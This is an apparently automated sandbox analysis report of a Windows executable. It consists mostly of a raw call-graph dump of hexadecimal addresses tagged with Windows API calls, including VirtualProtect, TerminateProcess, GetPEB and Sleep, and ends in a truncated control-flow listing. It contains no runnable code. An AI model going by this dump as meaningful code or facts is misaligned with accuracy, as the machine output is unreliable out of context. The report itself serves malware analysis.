94038->94045 94041->94030 94041->94031 94042->94034 94043->94041 94044->94033 94045->94032 94046->94032 94047->94027 94048->94032 94050 344d94 94049->94050 94051 344c8b 94049->94051 94050->93119 94051->94050 94052 35f4ea 48 API calls 94051->94052 94053 344cb2 94052->94053 94054 35f4ea 48 API calls 94053->94054 94059 344d22 94054->94059 94057 344dd9 48 API calls 94057->94059 94058 34ba85 48 API calls 94058->94059 94059->94050 94059->94057 94059->94058 94062 34b470 94059->94062 94090 389af1 48 API calls 94059->94090 94060->93121 94061->93123 94091 346b0f 94062->94091 94064 34b69b 94065 34ba85 48 API calls 94064->94065 94066 34b6b5 Mailbox 94065->94066 94066->94059 94069 3b397b 94101 3826bc 88 API calls 4 library calls 94069->94101 94072 34b9e4 94102 3826bc 88 API calls 4 library calls 94072->94102 94073 3b3973 94073->94066 94076 34ba85 48 API calls 94082 34b495 94076->94082 94077 3b3989 94079 34ba85 48 API calls 94077->94079 94078 34bcce 48 API calls 94078->94082 94079->94073 94080 3b3909 94083 346b4a 48 API calls 94080->94083 94081 34bb85 48 API calls 94081->94082 94082->94064 94082->94069 94082->94072 94082->94076 94082->94078 94082->94080 94082->94081 94086 34bdfa 48 API calls 94082->94086 94089 3b3939 ___crtGetEnvironmentStringsW 94082->94089 94096 34c413 59 API calls 94082->94096 94097 34bc74 48 API calls 94082->94097 94098 34c6a5 49 API calls 94082->94098 94099 34c799 48 API calls ___crtGetEnvironmentStringsW 94082->94099 94084 3b3914 94083->94084 94088 35f4ea 48 API calls 94084->94088 94087 34b66c CharUpperBuffW 94086->94087 94087->94082 94088->94089 94100 3826bc 88 API calls 4 library calls 94089->94100 94090->94059 94092 35f4ea 48 API calls 94091->94092 94093 346b34 94092->94093 94094 346b4a 48 API calls 94093->94094 94095 346b43 94094->94095 94095->94082 94096->94082 94097->94082 94098->94082 94099->94082 94100->94073 94101->94077 94102->94073 94104 3b418d EnumResourceNamesW 94103->94104 94105 34403c LoadImageW 94103->94105 94106 343ee1 RegisterClassExW 94104->94106 94105->94106 94107 343f53 7 API calls 94106->94107 94107->93138 94109 34ef1d 94108->94109 94110 34ef2f 94108->94110 94109->93165 94318 38cc5c 86 API calls 4 library calls 94110->94318 94112 3b86f9 94112->94112 94114 34f130 94113->94114 94117 34fe30 335 API calls 94114->94117 94121 34f199 94114->94121 94115 34f3dd 94118 3b87c8 94115->94118 94129 34f3f2 94115->94129 94161 34f431 Mailbox 94115->94161 94116 34f595 94123 34d7f7 48 API calls 94116->94123 94116->94161 94119 3b8728 94117->94119 94323 38cc5c 86 API calls 4 library calls 94118->94323 94119->94121 94320 38cc5c 86 API calls 4 library calls 94119->94320 94121->94115 94121->94116 94124 34d7f7 48 API calls 94121->94124 94157 34f229 94121->94157 94125 3b87a3 94123->94125 94127 3b8772 94124->94127 94322 360f0a 52 API calls __cinit 94125->94322 94126 3b8b1b 94139 3b8bcf 94126->94139 94140 3b8b2c 94126->94140 94321 360f0a 52 API calls __cinit 94127->94321 94155 34f418 94129->94155 94324 389af1 48 API calls 94129->94324 94130 34f770 94137 3b8a45 94130->94137 94154 34f77a 94130->94154 94132 34d6e9 55 API calls 94132->94161 94134 34fe30 335 API calls 94156 34f6aa 94134->94156 94135 3b8b7e 94333 39e40a 335 API calls Mailbox 94135->94333 94136 3b8c53 94338 38cc5c 86 API calls 4 library calls 94136->94338 94330 35c1af 48 API calls 94137->94330 94138 3b8810 94325 39eef8 335 API calls 94138->94325 94335 38cc5c 86 API calls 4 library calls 94139->94335 94332 39f5ee 335 API calls 94140->94332 94141 3b8beb 94336 39bdbd 335 API calls Mailbox 94141->94336 94143 34fe30 335 API calls 94143->94161 94148 351b90 48 API calls 94148->94161 94152 351b90 48 API calls 94152->94161 94153 3b8c00 94177 34f537 Mailbox 94153->94177 94337 38cc5c 86 API calls 4 library calls 94153->94337 94154->94152 94155->94126 94155->94156 94155->94161 94156->94130 94156->94134 94158 34fce0 94156->94158 94156->94161 94156->94177 94157->94115 94157->94116 94157->94155 94157->94161 94158->94177 94334 38cc5c 86 API calls 4 library calls 94158->94334 94160 3b8823 94160->94155 94165 3b884b 94160->94165 94161->94132 94161->94135 94161->94136 94161->94141 94161->94143 94161->94148 94161->94158 94164 38cc5c 86 API calls 94161->94164 94161->94177 94319 34dd47 48 API calls ___crtGetEnvironmentStringsW 94161->94319 94331 3797ed InterlockedDecrement 94161->94331 94339 35c1af 48 API calls 94161->94339 94164->94161 94326 39ccdc 48 API calls 94165->94326 94167 3b8857 94169 3b8865 94167->94169 94170 3b88aa 94167->94170 94327 389b72 48 API calls 94169->94327 94173 3b88a0 Mailbox 94170->94173 94177->93165 94179 354637 94178->94179 94180 35479f 94178->94180 94182 354643 94179->94182 94183 3b6e05 94179->94183 94181 34ce19 48 API calls 94180->94181 94190 3546e4 Mailbox 94181->94190 94340 354300 94182->94340 94408 39e822 94183->94408 94186 3b6e11 94187 354739 Mailbox 94186->94187 94448 38cc5c 86 API calls 4 library calls 94186->94448 94187->93165 94189 354659 94189->94186 94189->94187 94189->94190 94192 344252 84 API calls 94190->94192 94355 38fa0c 94190->94355 94396 386524 94190->94396 94399 396ff0 94190->94399 94192->94187 94196 35e253 94195->94196 94197 3bdf42 94195->94197 94196->93165 94198 3bdf77 94197->94198 94199 3bdf59 TranslateAcceleratorW 94197->94199 94199->94196 94201 35dca3 94200->94201 94203 35dc71 94200->94203 94201->93165 94202 35dc96 IsDialogMessageW 94202->94201 94202->94203 94203->94201 94203->94202 94204 3bdd1d GetClassLongW 94203->94204 94204->94202 94204->94203 94205->93165 94601 34bd30 94206->94601 94208 353267 94210 3b907a 94208->94210 94211 3532f8 94208->94211 94270 353628 94208->94270 94619 38cc5c 86 API calls 4 library calls 94210->94619 94613 35c36b 86 API calls 94211->94613 94215 353313 94265 3534eb Mailbox ___crtGetEnvironmentStringsW 94215->94265 94215->94270 94272 3b94df 94215->94272 94606 342b7a 94215->94606 94216 3b91fa 94624 38cc5c 86 API calls 4 library calls 94216->94624 94217 35c3c3 48 API calls 94217->94265 94221 3b93c5 94224 34fe30 335 API calls 94221->94224 94222 3b926d 94628 38cc5c 86 API calls 4 library calls 94222->94628 94223 3b909a 94223->94216 94225 34d645 53 API calls 94223->94225 94227 3b9407 94224->94227 94228 3b910c 94225->94228 94237 34d6e9 55 API calls 94227->94237 94227->94270 94231 3b9220 94228->94231 94232 3b9114 94228->94232 94229 3533ce 94234 353465 94229->94234 94235 3b945e 94229->94235 94229->94265 94625 341caa 49 API calls 94231->94625 94244 3b9128 94232->94244 94252 3b9152 94232->94252 94241 3b9438 94237->94241 94633 38cc5c 86 API calls 4 library calls 94241->94633 94242 3b923d 94243 34fe30 335 API calls 94243->94265 94620 38cc5c 86 API calls 4 library calls 94244->94620 94254 3b9177 94252->94254 94258 3b9195 94252->94258 94261 35f4ea 48 API calls 94261->94265 94263 35351f 94264 346eed 48 API calls 94263->94264 94266 353540 94263->94266 94264->94266 94265->94217 94265->94221 94265->94222 94265->94223 94265->94241 94265->94243 94265->94261 94265->94263 94267 3b9394 94265->94267 94265->94270 94615 34d9a0 53 API calls __cinit 94265->94615 94616 34d8c0 53 API calls 94265->94616 94617 35c2d6 48 API calls ___crtGetEnvironmentStringsW 94265->94617 94629 39cda2 82 API calls Mailbox 94265->94629 94630 3880e3 53 API calls 94265->94630 94631 34d764 55 API calls 94265->94631 94632 34dcae 50 API calls Mailbox 94265->94632 94266->94270 94271 3b94b0 94266->94271 94275 353585 94266->94275 94269 35f4ea 48 API calls 94267->94269 94269->94221 94277 353635 Mailbox 94270->94277 94618 38cc5c 86 API calls 4 library calls 94270->94618 94635 34dcae 50 API calls Mailbox 94271->94635 94272->94270 94636 38cc5c 86 API calls 4 library calls 94272->94636 94274 353615 94614 34dcae 50 API calls Mailbox 94274->94614 94275->94270 94275->94272 94275->94274 94277->93165 94278->93144 94279->93148 94280->93152 94281->93165 94282->93165 94283->93167 94284->93167 94285->93167 94287 34fe50 94286->94287 94312 34fe7e 94286->94312 94288 35f4ea 48 API calls 94287->94288 94288->94312 94289 360f0a 52 API calls __cinit 94289->94312 94290 35146e 94291 346eed 48 API calls 94290->94291 94313 34ffe1 94291->94313 94292 3797ed InterlockedDecrement 94292->94312 94293 350509 94656 38cc5c 86 API calls 4 library calls 94293->94656 94296 35f4ea 48 API calls 94296->94312 94298 351473 94655 38cc5c 86 API calls 4 library calls 94298->94655 94299 3ba922 94299->93165 94300 3ba246 94304 346eed 48 API calls 94300->94304 94302 346eed 48 API calls 94302->94312 94304->94313 94305 34d7f7 48 API calls 94305->94312 94306 3ba873 94306->93165 94307 3ba30e 94307->94313 94653 3797ed InterlockedDecrement 94307->94653 94309 3ba973 94657 38cc5c 86 API calls 4 library calls 94309->94657 94311 3ba982 94312->94289 94312->94290 94312->94292 94312->94293 94312->94296 94312->94298 94312->94300 94312->94302 94312->94305 94312->94307 94312->94309 94312->94313 94314 3515b5 94312->94314 94638 351d10 94312->94638 94652 351820 335 API calls 2 library calls 94312->94652 94313->93165 94654 38cc5c 86 API calls 4 library calls 94314->94654 94315->93167 94316->93167 94317->93167 94318->94112 94319->94161 94320->94121 94321->94157 94322->94161 94323->94177 94324->94138 94325->94160 94326->94167 94327->94173 94330->94161 94331->94161 94332->94161 94333->94158 94334->94177 94335->94177 94336->94153 94337->94177 94338->94177 94339->94161 94341 3b6e60 94340->94341 94344 35432c 94340->94344 94450 38cc5c 86 API calls 4 library calls 94341->94450 94343 3b6e71 94451 38cc5c 86 API calls 4 library calls 94343->94451 94344->94343 94351 354366 ___crtGetEnvironmentStringsW 94344->94351 94346 354435 94352 354445 94346->94352 94449 39cda2 82 API calls Mailbox 94346->94449 94347 35f4ea 48 API calls 94347->94351 94349 3544b1 94349->94189 94350 34fe30 335 API calls 94350->94351 94351->94346 94351->94347 94351->94350 94351->94352 94353 3b6ebd 94351->94353 94352->94189 94452 38cc5c 86 API calls 4 library calls 94353->94452 94356 38fa1c __ftell_nolock 94355->94356 94357 38fa44 94356->94357 94514 34d286 48 API calls 94356->94514 94359 34936c 81 API calls 94357->94359 94361 38fa5e 94359->94361 94360 38fb92 94360->94187 94361->94360 94362 38fb68 94361->94362 94363 38fa80 94361->94363 94364 3441a9 136 API calls 94362->94364 94365 34936c 81 API calls 94363->94365 94366 38fb79 94364->94366 94370 38fa8c _wcscpy _wcschr 94365->94370 94367 38fb8e 94366->94367 94368 3441a9 136 API calls 94366->94368 94367->94360 94368->94367 94375 38fab0 _wcscat _wcscpy 94370->94375 94379 38fade _wcscat 94370->94379 94373 34936c 81 API calls 94377 34936c 81 API calls 94375->94377 94377->94379 94379->94373 94588 386ca9 GetFileAttributesW 94396->94588 94400 34936c 81 API calls 94399->94400 94401 39702a 94400->94401 94402 34b470 91 API calls 94401->94402 94403 39703a 94402->94403 94404 34fe30 335 API calls 94403->94404 94405 39705f 94403->94405 94404->94405 94407 397063 94405->94407 94592 34cdb9 48 API calls 94405->94592 94407->94187 94409 39e868 94408->94409 94410 39e84e 94408->94410 94594 39ccdc 48 API calls 94409->94594 94593 38cc5c 86 API calls 4 library calls 94410->94593 94413 39e871 94414 34fe30 334 API calls 94413->94414 94415 39e8cf 94414->94415 94416 39e96a 94415->94416 94418 39e916 94415->94418 94447 39e860 Mailbox 94415->94447 94417 39e978 94416->94417 94422 39e9c7 94416->94422 94596 38a69d 48 API calls 94417->94596 94595 389b72 48 API calls 94418->94595 94421 39e949 94424 3545e0 334 API calls 94421->94424 94425 34936c 81 API calls 94422->94425 94422->94447 94423 39e99b 94597 34bc74 48 API calls 94423->94597 94424->94447 94426 39e9e1 94425->94426 94447->94186 94448->94187 94449->94349 94450->94343 94451->94352 94452->94352 94514->94357 94589 386cc4 FindFirstFileW 94588->94589 94591 386529 94588->94591 94590 386cd9 FindClose 94589->94590 94589->94591 94590->94591 94591->94187 94592->94407 94593->94447 94594->94413 94595->94421 94596->94423 94602 34bd3f 94601->94602 94605 34bd5a 94601->94605 94603 34bdfa 48 API calls 94602->94603 94604 34bd47 CharUpperBuffW 94603->94604 94604->94605 94605->94208 94607 3b436a 94606->94607 94608 342b8b 94606->94608 94609 35f4ea 48 API calls 94608->94609 94610 342b92 94609->94610 94611 342bb3 94610->94611 94637 342bce 48 API calls 94610->94637 94611->94229 94613->94215 94614->94270 94615->94265 94616->94265 94617->94265 94618->94277 94619->94215 94620->94270 94624->94270 94625->94242 94628->94270 94629->94265 94630->94265 94631->94265 94632->94265 94633->94270 94635->94272 94636->94270 94637->94611 94639 351d2a 94638->94639 94642 351ed6 94638->94642 94640 352357 94639->94640 94639->94642 94643 351e0b 94639->94643 94648 351eba 94639->94648 94640->94648 94661 389f44 58 API calls __gmtime64_s 94640->94661 94642->94640 94645 351e9a Mailbox 94642->94645 94647 351f55 94642->94647 94642->94648 94644 351e47 94643->94644 94643->94647 94643->94648 94644->94645 94644->94648 94651 3bbfc4 94644->94651 94645->94648 94660 36203b 58 API calls __wtof_l 94645->94660 94647->94645 94647->94648 94659 3797ed InterlockedDecrement 94647->94659 94648->94312 94658 36203b 58 API calls __wtof_l 94651->94658 94652->94312 94653->94313 94654->94313 94655->94306 94656->94299 94657->94311 94658->94648 94659->94645 94660->94648 94661->94648 94662 35221a 94663 35271e 94662->94663 94664 352223 94662->94664 94672 351eba Mailbox 94663->94672 94673 37a58f 48 API calls ___crtGetEnvironmentStringsW 94663->94673 94664->94663 94665 34936c 81 API calls 94664->94665 94666 35224e 94665->94666 94666->94663 94667 35225e 94666->94667 94670 34b384 48 API calls 94667->94670 94669 3bbe8a 94671 346eed 48 API calls 94669->94671 94670->94672 94671->94672 94673->94669 94674 3b19cb 94679 342322 94674->94679 94676 3b19d1 94712 360f0a 52 API calls __cinit 94676->94712 94678 3b19db 94680 342344 94679->94680 94713 3426df 94680->94713 94685 34d7f7 48 API calls 94686 342384 94685->94686 94687 34d7f7 48 API calls 94686->94687 94688 34238e 94687->94688 94689 34d7f7 48 API calls 94688->94689 94690 342398 94689->94690 94691 34d7f7 48 API calls 94690->94691 94692 3423de 94691->94692 94693 34d7f7 48 API calls 94692->94693 94694 3424c1 94693->94694 94721 34263f 94694->94721 94698 3424f1 94699 34d7f7 48 API calls 94698->94699 94700 3424fb 94699->94700 94750 342745 94700->94750 94702 342546 94703 342556 GetStdHandle 94702->94703 94704 3425b1 94703->94704 94705 3b501d 94703->94705 94706 3425b7 CoInitialize 94704->94706 94705->94704 94707 3b5026 94705->94707 94706->94676 94757 3892d4 53 API calls 94707->94757 94709 3b502d 94758 3899f9 CreateThread 94709->94758 94711 3b5039 CloseHandle 94711->94706 94712->94678 94759 342854 94713->94759 94716 346a63 48 API calls 94717 34234a 94716->94717 94718 34272e 94717->94718 94773 3427ec 6 API calls 94718->94773 94720 34237a 94720->94685 94722 34d7f7 48 API calls 94721->94722 94723 34264f 94722->94723 94724 34d7f7 48 API calls 94723->94724 94725 342657 94724->94725 94774 3426a7 94725->94774 94728 3426a7 48 API calls 94729 342667 94728->94729 94730 34d7f7 48 API calls 94729->94730 94731 342672 94730->94731 94732 35f4ea 48 API calls 94731->94732 94733 3424cb 94732->94733 94734 3422a4 94733->94734 94735 3422b2 94734->94735 94736 34d7f7 48 API calls 94735->94736 94737 3422bd 94736->94737 94738 34d7f7 48 API calls 94737->94738 94739 3422c8 94738->94739 94740 34d7f7 48 API calls 94739->94740 94741 3422d3 94740->94741 94742 34d7f7 48 API calls 94741->94742 94743 3422de 94742->94743 94744 3426a7 48 API calls 94743->94744 94745 3422e9 94744->94745 94746 35f4ea 48 API calls 94745->94746 94747 3422f0 94746->94747 94748 3b1fe7 94747->94748 94749 3422f9 RegisterWindowMessageW 94747->94749 94749->94698 94751 342755 94750->94751 94752 3b5f4d 94750->94752 94754 35f4ea 48 API calls 94751->94754 94779 38c942 50 API calls 94752->94779 94755 34275d 94754->94755 94755->94702 94756 3b5f58 94757->94709 94758->94711 94780 3899df 54 API calls 94758->94780 94766 342870 94759->94766 94762 342870 48 API calls 94763 342864 94762->94763 94764 34d7f7 48 API calls 94763->94764 94765 342716 94764->94765 94765->94716 94767 34d7f7 48 API calls 94766->94767 94768 34287b 94767->94768 94769 34d7f7 48 API calls 94768->94769 94770 342883 94769->94770 94771 34d7f7 48 API calls 94770->94771 94772 34285c 94771->94772 94772->94762 94773->94720 94775 34d7f7 48 API calls 94774->94775 94776 3426b0 94775->94776 94777 34d7f7 48 API calls 94776->94777 94778 34265f 94777->94778 94778->94728 94779->94756 94781 343742 94782 34374b 94781->94782 94783 3437c8 94782->94783 94784 343769 94782->94784 94785 3437c6 94782->94785 94787 3437ce 94783->94787 94788 3b1e00 94783->94788 94789 343776 94784->94789 94790 34382c PostQuitMessage 94784->94790 94786 3437ab DefWindowProcW 94785->94786 94796 3437b9 94786->94796 94791 3437f6 SetTimer RegisterWindowMessageW 94787->94791 94792 3437d3 94787->94792 94836 342ff6 16 API calls 94788->94836 94794 3b1e88 94789->94794 94795 343781 94789->94795 94790->94796 94791->94796 94800 34381f CreatePopupMenu 94791->94800 94797 3b1da3 94792->94797 94798 3437da KillTimer 94792->94798 94842 384ddd 60 API calls _memset 94794->94842 94801 343836 94795->94801 94802 343789 94795->94802 94810 3b1da8 94797->94810 94811 3b1ddc MoveWindow 94797->94811 94833 343847 Shell_NotifyIconW _memset 94798->94833 94799 3b1e27 94837 35e312 335 API calls Mailbox 94799->94837 94800->94796 94826 35eb83 94801->94826 94806 343794 94802->94806 94807 3b1e6d 94802->94807 94815 34379f 94806->94815 94816 3b1e58 94806->94816 94807->94786 94841 37a5f3 48 API calls 94807->94841 94808 3b1e9a 94808->94786 94808->94796 94812 3b1dcb SetFocus 94810->94812 94813 3b1dac 94810->94813 94811->94796 94812->94796 94813->94815 94817 3b1db5 94813->94817 94814 3437ed 94834 34390f DeleteObject DestroyWindow Mailbox 94814->94834 94815->94786 94838 343847 Shell_NotifyIconW _memset 94815->94838 94840 3855bd 70 API calls _memset 94816->94840 94835 342ff6 16 API calls 94817->94835 94822 3b1e68 94822->94796 94824 3b1e4c 94839 344ffc 67 API calls _memset 94824->94839 94827 35ec1c 94826->94827 94828 35eb9a _memset 94826->94828 94827->94796 94843 3451af 94828->94843 94830 35ec05 KillTimer SetTimer 94830->94827 94831 35ebc1 94831->94830 94832 3b3c7a Shell_NotifyIconW 94831->94832 94832->94830 94833->94814 94834->94796 94835->94796 94836->94799 94837->94815 94838->94824 94839->94785 94840->94822 94841->94785 94842->94808 94844 3452a2 Mailbox 94843->94844 94845 3451cb 94843->94845 94844->94831 94846 346b0f 48 API calls 94845->94846 94847 3451d9 94846->94847 94848 3451e6 94847->94848 94849 3b3ca1 LoadStringW 94847->94849 94850 346a63 48 API calls 94848->94850 94852 3b3cbb 94849->94852 94851 3451fb 94850->94851 94851->94852 94853 34520c 94851->94853 94854 34510d 48 API calls 94852->94854 94855 345216 94853->94855 94856 3452a7 94853->94856 94859 3b3cc5 94854->94859 94858 34510d 48 API calls 94855->94858 94857 346eed 48 API calls 94856->94857 94861 345220 _memset _wcscpy 94857->94861 94858->94861 94860 34518c 48 API calls 94859->94860 94859->94861 94862 3b3ce7 94860->94862 94863 345288 Shell_NotifyIconW 94861->94863 94864 34518c 48 API calls 94862->94864 94863->94844 94864->94861 94865 ced518 94879 ceb168 94865->94879 94867 ced5dd 94882 ced408 94867->94882 94885 cee628 GetPEB 94879->94885 94881 ceb7f3 94881->94867 94883 ced411 Sleep 94882->94883 94884 ced41f 94883->94884 94886 cee652 94885->94886 94886->94881 94887 3b9bec 94921 350ae0 Mailbox ___crtGetEnvironmentStringsW 94887->94921 94889 35f4ea 48 API calls 94889->94921 94890 351526 Mailbox 94977 38cc5c 86 API calls 4 library calls 94890->94977 94893 350509 94980 38cc5c 86 API calls 4 library calls 94893->94980 94894 35146e 94902 346eed 48 API calls 94894->94902 94895 351d10 59 API calls 94918 34fec8 94895->94918 94897 35f4ea 48 API calls 94897->94918 94898 351473 94979 38cc5c 86 API calls 4 library calls 94898->94979 94900 346eed 48 API calls 94900->94918 94919 34ffe1 Mailbox 94902->94919 94903 3ba922 94904 3ba246 94907 346eed 48 API calls 94904->94907 94907->94919 94908 3ba873 94909 3ba30e 94909->94919 94975 3797ed InterlockedDecrement 94909->94975 94910 34d7f7 48 API calls 94910->94918 94911 34ce19 48 API calls 94911->94921 94913 360f0a 52 API calls __cinit 94913->94918 94914 3797ed InterlockedDecrement 94914->94918 94915 3ba973 94981 38cc5c 86 API calls 4 library calls 94915->94981 94917 3ba982 94918->94893 94918->94894 94918->94895 94918->94897 94918->94898 94918->94900 94918->94904 94918->94909 94918->94910 94918->94913 94918->94914 94918->94915 94918->94919 94920 3515b5 94918->94920 94973 351820 335 API calls 2 library calls 94918->94973 94978 38cc5c 86 API calls 4 library calls 94920->94978 94921->94889 94921->94890 94921->94911 94921->94918 94921->94919 94922 39e822 335 API calls 94921->94922 94923 34fe30 335 API calls 94921->94923 94924 3ba706 94921->94924 94926 3797ed InterlockedDecrement 94921->94926 94929 3a0d09 94921->94929 94932 3a0d1d 94921->94932 94935 39f0ac 94921->94935 94967 38a6ef 94921->94967 94974 39ef61 82 API calls 2 library calls 94921->94974 94922->94921 94923->94921 94976 38cc5c 86 API calls 4 library calls 94924->94976 94926->94921 94982 39f8ae 94929->94982 94931 3a0d19 94931->94921 94933 39f8ae 129 API calls 94932->94933 94934 3a0d2d 94933->94934 94934->94921 94936 34d7f7 48 API calls 94935->94936 94937 39f0c0 94936->94937 94938 34d7f7 48 API calls 94937->94938 94939 39f0c8 94938->94939 94940 34d7f7 48 API calls 94939->94940 94941 39f0d0 94940->94941 94942 34936c 81 API calls 94941->94942 94955 39f0de 94942->94955 94943 346a63 48 API calls 94943->94955 94944 39f2cc 94945 39f2f9 Mailbox 94944->94945 95069 346b68 48 API calls 94944->95069 94945->94921 94947 39f2b3 94951 34518c 48 API calls 94947->94951 94948 34c799 48 API calls 94948->94955 94949 39f2ce 94952 34518c 48 API calls 94949->94952 94950 346eed 48 API calls 94950->94955 94953 39f2c0 94951->94953 94954 39f2dd 94952->94954 94957 34510d 48 API calls 94953->94957 94958 34510d 48 API calls 94954->94958 94955->94943 94955->94944 94955->94945 94955->94947 94955->94948 94955->94949 94955->94950 94956 34bdfa 48 API calls 94955->94956 94959 34bdfa 48 API calls 94955->94959 94964 34518c 48 API calls 94955->94964 94965 34936c 81 API calls 94955->94965 94966 34510d 48 API calls 94955->94966 94960 39f175 CharUpperBuffW 94956->94960 94957->94944 94958->94944 94961 39f23a CharUpperBuffW 94959->94961 94962 34d645 53 API calls 94960->94962 95068 35d922 55 API calls 2 library calls 94961->95068 94962->94955 94964->94955 94965->94955 94966->94955 94968 38a6fb 94967->94968 94969 35f4ea 48 API calls 94968->94969 94970 38a709 94969->94970 94971 34d7f7 48 API calls 94970->94971 94972 38a717 94970->94972 94971->94972 94972->94921 94973->94918 94974->94921 94975->94919 94976->94890 94977->94919 94978->94919 94979->94908 94980->94903 94981->94917 94983 34936c 81 API calls 94982->94983 94984 39f8ea 94983->94984 95008 39f92c Mailbox 94984->95008 95018 3a0567 94984->95018 94986 39fb8b 94987 39fcfa 94986->94987 94991 39fb95 94986->94991 95054 3a0688 89 API calls Mailbox 94987->95054 94990 39fd07 94990->94991 94993 39fd13 94990->94993 95031 39f70a 94991->95031 94992 34936c 81 API calls 95012 39f984 Mailbox 94992->95012 94993->95008 94998 39fbc9 95045 35ed18 94998->95045 95001 39fbfd 95004 35c050 48 API calls 95001->95004 95002 39fbe3 95051 38cc5c 86 API calls 4 library calls 95002->95051 95006 39fc14 95004->95006 95005 39fbee GetCurrentProcess TerminateProcess 95005->95001 95009 351b90 48 API calls 95006->95009 95017 39fc3e 95006->95017 95007 39fd65 95007->95008 95014 39fd7e FreeLibrary 95007->95014 95008->94931 95010 39fc2d 95009->95010 95052 3a040f 105 API calls _free 95010->95052 95012->94986 95012->94992 95012->95008 95049 3a29e8 48 API calls ___crtGetEnvironmentStringsW 95012->95049 95050 39fda5 60 API calls 2 library calls 95012->95050 95013 351b90 48 API calls 95013->95017 95014->95008 95017->95007 95017->95013 95053 34dcae 50 API calls Mailbox 95017->95053 95055 3a040f 105 API calls _free 95017->95055 95019 34bdfa 48 API calls 95018->95019 95020 3a0582 CharLowerBuffW 95019->95020 95056 381f11 95020->95056 95024 34d7f7 48 API calls 95025 3a05bb 95024->95025 95063 3469e9 48 API calls ___crtGetEnvironmentStringsW 95025->95063 95027 3a05d2 95028 34b18b 48 API calls 95027->95028 95029 3a05de Mailbox 95028->95029 95030 3a061a Mailbox 95029->95030 95064 39fda5 60 API calls 2 library calls 95029->95064 95030->95012 95032 39f77a 95031->95032 95033 39f725 95031->95033 95037 3a0828 95032->95037 95034 35f4ea 48 API calls 95033->95034 95036 39f747 95034->95036 95035 35f4ea 48 API calls 95035->95036 95036->95032 95036->95035 95038 3a0a53 Mailbox 95037->95038 95044 3a084b _strcat _wcscpy __wsetenvp 95037->95044 95038->94998 95039 34d286 48 API calls 95039->95044 95040 34cf93 58 API calls 95040->95044 95041 34936c 81 API calls 95041->95044 95042 36395c 47 API calls __malloc_crt 95042->95044 95044->95038 95044->95039 95044->95040 95044->95041 95044->95042 95067 388035 50 API calls __wsetenvp 95044->95067 95047 35ed2d 95045->95047 95046 35edc5 VirtualProtect 95048 35ed93 95046->95048 95047->95046 95047->95048 95048->95001 95048->95002 95049->95012 95050->95012 95051->95005 95052->95017 95053->95017 95054->94990 95055->95017 95057 381f3b __wsetenvp 95056->95057 95058 381f79 95057->95058 95059 381f6f 95057->95059 95061 381ffa 95057->95061 95058->95024 95058->95029 95059->95058 95065 35d37a 60 API calls 95059->95065 95061->95058 95066 35d37a 60 API calls 95061->95066 95063->95027 95064->95030 95065->95059 95066->95061 95067->95044 95068->94955 95069->94945 95070 34e3e3 95071 34fe30 335 API calls 95070->95071 95083 34e3ef ___crtGetEnvironmentStringsW 95071->95083 95072 3b7bc6 95107 38cc5c 86 API calls 4 library calls 95072->95107 95074 3b7be4 95074->95074 95075 34e450 95076 34e80b Mailbox 95080 35f4ea 48 API calls 95076->95080 95077 34e731 95078 34e746 95077->95078 95079 3b7bb7 95077->95079 95081 35f4ea 48 API calls 95078->95081 95106 39cd62 50 API calls 95079->95106 95091 34e5ab ___crtGetEnvironmentStringsW 95080->95091 95096 34e644 95081->95096 95083->95072 95083->95075 95083->95076 95084 35f4ea 48 API calls 95083->95084 95085 34e597 95083->95085 95094 34e609 95083->95094 95084->95083 95085->95076 95087 34e5a4 95085->95087 95086 35f4ea 48 API calls 95088 34e5d6 95086->95088 95090 35f4ea 48 API calls 95087->95090 95088->95094 95101 34df5f 335 API calls 95088->95101 95089 3b7ba6 95105 38cc5c 86 API calls 4 library calls 95089->95105 95090->95091 95091->95086 95091->95088 95091->95094 95094->95077 95094->95089 95094->95096 95097 3b7b7e 95094->95097 95099 3b7b59 95094->95099 95102 3456b0 335 API calls 95094->95102 95104 38cc5c 86 API calls 4 library calls 95097->95104 95103 38cc5c 86 API calls 4 library calls 95099->95103 95101->95094 95102->95094 95103->95096 95104->95096 95105->95096 95106->95072 95107->95074 95108 38bb64 95109 38bb77 95108->95109 95110 38bb71 95108->95110 95112 361c9d _free 47 API calls 95109->95112 95114 38bb88 95109->95114 95111 361c9d _free 47 API calls 95110->95111 95111->95109 95112->95114 95113 361c9d _free 47 API calls 95115 38bb9a 95113->95115 95114->95113 95114->95115 95116 3b9c06 95127 35d3be 95116->95127 95118 3b9c1c 95126 3b9c91 Mailbox 95118->95126 95136 341caa 49 API calls 95118->95136 95120 353200 335 API calls 95121 3b9cc5 95120->95121 95124 3ba7ab Mailbox 95121->95124 95138 38cc5c 86 API calls 4 library calls 95121->95138 95123 3b9c71 95123->95121 95137 38b171 48 API calls 95123->95137 95126->95120 95128 35d3dc 95127->95128 95129 35d3ca 95127->95129 95131 35d3e2 95128->95131 95132 35d40b 95128->95132 95139 34dcae 50 API calls Mailbox 95129->95139 95134 35f4ea 48 API calls 95131->95134 95140 34dcae 50 API calls Mailbox 95132->95140 95135 35d3d4 95134->95135 95135->95118 95136->95123 95137->95126 95138->95124 95139->95135 95140->95135

                                                    Executed Functions

                                                    Function 0036B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 643 36b043-36b080 call 36f8a0 646 36b082-36b084 643->646 647 36b089-36b08b 643->647 648 36b860-36b86c call 36a70c 646->648 649 36b0ac-36b0d9 647->649 650 36b08d-36b0a7 call 367bda call 367c0e call 366e10 647->650 651 36b0e0-36b0e7 649->651 652 36b0db-36b0de 649->652 650->648 656 36b105 651->656 657 36b0e9-36b100 call 367bda call 367c0e call 366e10 651->657 652->651 655 36b10b-36b110 652->655 660 36b112-36b11c call 36f82f 655->660 661 36b11f-36b12d call 373bf2 655->661 656->655 692 36b851-36b854 657->692 660->661 673 36b133-36b145 661->673 674 36b44b-36b45d 661->674 673->674 676 36b14b-36b183 call 367a0d GetConsoleMode 673->676 677 36b463-36b473 674->677 678 36b7b8-36b7d5 WriteFile 674->678 676->674 699 36b189-36b18f 676->699 683 36b55a-36b55f 677->683 684 36b479-36b484 677->684 680 36b7d7-36b7df 678->680 681 36b7e1-36b7e7 GetLastError 678->681 686 36b7e9 680->686 681->686 687 36b565-36b56e 683->687 688 36b663-36b66e 683->688 690 36b48a-36b49a 684->690 691 36b81b-36b833 684->691 696 36b7ef-36b7f1 686->696 687->691 697 36b574 687->697 688->691 695 36b674 688->695 700 36b4a0-36b4a3 690->700 693 36b835-36b838 691->693 694 36b83e-36b84e call 367c0e call 367bda 691->694 698 